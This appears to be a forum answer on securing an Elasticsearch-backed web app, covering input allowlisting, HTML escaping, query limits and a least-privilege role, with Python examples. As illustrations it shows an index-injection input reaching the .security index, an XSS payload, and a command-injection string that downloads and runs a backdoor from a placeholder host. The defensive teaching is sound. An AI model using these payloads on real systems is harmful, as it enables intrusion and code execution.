Short answer: Yes, you should probably do both input validation and output sanitization.
Input Validation
You should always assume there will be malicious users; the payload won't always be "XPTO". Depending on which client you use and how you incorporate user input when building your queries, there are attack vectors that can be dangerous. Take the simplistic case where you want to allow access only to cesar_* indices, and your web app takes the user input (e.g. "xpto") and feeds it into curl to fetch all documents of the cesar_xpto index:

curl -uelastic:password -X GET "localhost:9200/cesar_{}/_search"

With the input substituted, the command becomes:

curl -uelastic:password -X GET "localhost:9200/cesar_xpto/_search"
What happens if the user specifies xpto,.security as the input? The request then becomes

curl -uelastic:password -X GET "localhost:9200/cesar_xpto,.security/_search"

and the user gets access to the documents of the internal security index. As mentioned, this is a very simplistic example; in this scenario a more interesting attack vector would be command injection (e.g. an attacker supplying " && wget http://a.b.com/backdoor.py && chmod +x backdoor.py && ./backdoor.py as input), but it illustrates the possibility.
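App-side, the fix is to validate the input against a strict allowlist before it ever reaches the query. Here is a minimal Python sketch of that idea (the pattern and function name are my own illustration, not from any particular framework):

```python
import re

# Only lowercase letters and digits are allowed in the index suffix, so
# metacharacters like "," (multi-index), "*" (wildcard), leading "." (system
# indices), and shell characters are rejected outright.
SUFFIX_PATTERN = re.compile(r"^[a-z0-9]{1,64}$")

def build_index_name(user_input: str) -> str:
    """Return a safe cesar_* index name, or raise on suspicious input."""
    if not SUFFIX_PATTERN.fullmatch(user_input):
        raise ValueError(f"invalid index suffix: {user_input!r}")
    return f"cesar_{user_input}"
```

With this in place, `build_index_name("xpto")` yields `cesar_xpto`, while inputs like `xpto,.security` or `" && wget ..."` raise before any request is built. Allowlisting known-good characters is generally safer than trying to blocklist known-bad ones.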
If you use e.g. the Java High Level REST Client to build your queries, you'll be much safer from injection attacks at the Elasticsearch layer, but your application might still be susceptible to other attack types. You should also think about DoS attacks, where users might be able to run many consecutive expensive queries, causing CPU/memory starvation in your Elasticsearch cluster.
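On the DoS point, Elasticsearch lets you cap individual searches at the request level via the `timeout`, `terminate_after`, and `size` parameters of the search body. A rough sketch of wrapping user-supplied queries with such limits (the wrapper function itself is hypothetical; the three parameters are real search-body options):

```python
def constrain_search_body(user_query: dict) -> dict:
    """Wrap a user-supplied query with defensive limits before sending it to ES."""
    return {
        "query": user_query,
        "timeout": "2s",            # abort shard searches that run too long
        "terminate_after": 10_000,  # stop collecting after this many docs per shard
        "size": 100,                # never return unbounded result pages
    }
```

This does not replace application-level rate limiting, but it bounds the cost of any single query an attacker can submit.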
Output Sanitization
Elasticsearch returns JSON responses (with the HTTP response header content-type: application/json; charset=UTF-8). That means that even if Elasticsearch reflects back portions of the query - which it does in error cases - there is no danger of reflected XSS, as the browser has no reason to interpret the response as HTML. However, if you take the response and present it to the user in the context of a web app, things change. For instance:
curl -uelastic:password -X GET 'localhost:9200/something<img%20src=x%20onerror=alert(1))>'
will get the following response from Elasticsearch:
{"error":{"root_cause":[{"type":"index_not_found_exception","reason":"no such index","index_uuid":"_na_","resource.type":"index_or_alias","resource.id":"something<img src=x onerror=alert(1))>","index":"something<img src=x onerror=alert(1))>"}],"type":"index_not_found_exception","reason":"no such index","index_uuid":"_na_","resource.type":"index_or_alias","resource.id":"something<img src=x onerror=alert(1))>","index":"something<img src=x onerror=alert(1))>"},"status":404}
Now, if you put this as-is into a response page of your web app without escaping it, the <img src=x onerror=alert(1))> part will be executed in the user's browser. Again, just an example.
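The standard fix is to HTML-escape anything taken from the response before interpolating it into a page. In Python, for instance, the standard library covers this:

```python
import html

# Fragment of an Elasticsearch error reason reflected back to the user.
error_fragment = "no such index: something<img src=x onerror=alert(1))>"

# Escaping turns the markup into inert text the browser renders literally.
safe_fragment = html.escape(error_fragment)
print(safe_fragment)
# → no such index: something&lt;img src=x onerror=alert(1))&gt;
```

Most templating engines (Jinja2, JSX, Thymeleaf, etc.) do this automatically as long as you don't opt out with "raw"/"safe" markers.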
Least Privilege Principle
Another thing worth noting: you should not run all the queries as a superuser (i.e. the elastic user). Figure out the least privileges your users will need, create a role with those privileges, assign the role to a service-account user, and use that user to make the requests to Elasticsearch via the client. This way, even if a user finds a way to trick your application logic, the impact on your Elasticsearch cluster will be contained.
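As a concrete sketch: with Elasticsearch security enabled, a read-only role scoped to the cesar_* indices could be defined with a body like the one below, sent to the _security/role API (the role name cesar_reader is a placeholder of my own):

```python
import json

# Role granting read-only access to cesar_* indices and nothing else.
# Would be sent as: POST /_security/role/cesar_reader
cesar_reader_role = {
    "cluster": [],  # no cluster-level privileges
    "indices": [
        {
            "names": ["cesar_*"],
            "privileges": ["read"],
        }
    ],
}
print(json.dumps(cesar_reader_role, indent=2))
```

A service-account user assigned only this role cannot touch .security or any other index, even if your input validation fails.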
Hope this helps